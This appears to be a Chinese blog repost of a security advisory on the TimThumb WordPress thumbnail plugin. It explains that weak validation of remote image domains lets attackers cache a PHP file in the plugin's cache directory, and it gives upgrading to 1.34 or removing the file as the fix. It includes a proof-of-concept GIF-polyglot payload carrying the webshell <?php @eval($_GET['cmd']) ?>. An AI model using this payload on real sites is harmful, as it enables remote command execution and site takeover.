php x01 x00 x01,WordPress 严重的远程备份执行代码漏洞

本文详细介绍了WordPress中Timthumb插件的安全问题,该插件因未能充分验证远程图像源,允许恶意用户通过缓存目录上传恶意文件。攻击者可利用此漏洞在网站上部署webshell。解决方案是升级到最新版本1.34或直接移除timthumb文件。此漏洞影响多个CMS和博客平台,提醒用户谨慎使用并定期更新插件。
摘要由CSDN通过智能技术生成

timthumb插件的问题,通过制订特殊的图像文件,用一个有效MIME-type前面加一个PHP文件

最后,它可能要使TimThumb相信它

是一个正常的图片,因此缓存在缓存目录。

存储文件的目标:(这可能会从主机的主机。)

md5($src); means the input value of the 'src' GET-request - Hashed in MD5 format.

影响版本:1.* - 1.32(版本为1.19和1.32)进行检测。(1.33版没有保存缓存文件作为.php)

概念性的证明文件:

\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00

\xFF\xFF\xFF\x00\x00\x00\x21\xF9\x04\x01\x00\x00\x00

\x00\x2C\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02

\x44\x01\x00\x3B\x00\x3C\x3F\x70\x68\x70\x20\x40\x65

\x76\x61\x6C\x28\x24\x5F\x47\x45\x54\x5B\x27\x63\x6D

\x64\x27\x5D\x29\x3B\x20\x3F\x3E\x00

(Transparent GIF +<?php @eval($_GET['cmd']) ?>

e01d14264a97527f8b82a1ed.jpg

好多***大牛的博客多被日了。快检查哦!!!!

解决方案::::

更新的最新的版本是1.34或者删除timthumb文件。

PS:timthumb插件的问题,好多CMS或者博客多死在插件的漏洞上面,

所以大家还是少装点插件,能用代码解决应当要用插件。这次的问题比较严重,能

直接上传webshell。插件名称:Wordpress Timthumb一款缩略图功能的插件。

漏洞文件:timthumb.php,该文档定义了数个可以远程提取的相册,但脚本并没有

很好地验证这些域名,因此类似“http://flickr.com.maliciousdomain.com”这样的

欺骗性二三级域名也会被通过,所以***理论上可以用任何域名后缀轻松仿冒,

并通过缓存目录上传各种恶意程序。

作者:MaXe,由情整理编辑。

219259fc987cc6eab801a0ed.jpg

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值